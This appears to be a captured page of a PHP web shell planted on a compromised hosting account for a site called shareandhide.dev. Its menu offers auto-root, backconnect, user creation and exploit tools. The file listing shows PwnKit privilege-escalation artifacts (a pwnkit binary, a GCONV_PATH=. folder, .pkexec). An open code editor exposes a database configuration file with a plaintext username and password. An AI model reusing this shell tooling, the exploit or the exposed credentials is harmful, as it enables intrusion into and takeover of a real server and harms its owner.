Linux 120.141.167.72.host.secureserver.net 4.18.0-553.150.1.el8_10.x86_64 #1 SMP Fri Jul 31 15:23:31 EDT 2026 x86_64
Apache
: 72.167.141.120 | : 216.73.216.4
808 Domain
8.0.30
bestseocompany
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
bestseocompany /
public_html /
shareandhide.dev /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
.well-known
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
uploads
[ DIR ]
drwxrwxrwx
.htaccess
281
B
-rw-r--r--
.mad-root
0
B
-rw-r--r--
access.php
4.49
KB
-rw-r--r--
db.php
842
B
-rw-r--r--
delete.php
625
B
-rw-r--r--
generate.php
1.97
KB
-rw-r--r--
index.php
483
B
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
style.css
444
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : db.php
<?php // Database connection configuration $host = 'localhost'; // Your database host (e.g., localhost) $db = 'bestseocompany_shareandhide'; // Your database name $user = 'bestseocompany_shareandhide_user'; // Your database username $pass = 'k76uw2yN_zsn'; // Your database password $charset = 'utf8mb4'; // Character set // Set up the DSN (Data Source Name) $dsn = "mysql:host=$host;dbname=$db;charset=$charset"; // Database connection options $options = [ PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION, PDO::ATTR_DEFAULT_FETCH_MODE => PDO::FETCH_ASSOC, PDO::ATTR_EMULATE_PREPARES => false, ]; try { // Create a new PDO instance $pdo = new PDO($dsn, $user, $pass, $options); } catch (PDOException $e) { // Handle connection error die("Database connection failed: " . $e->getMessage()); } ?>
Close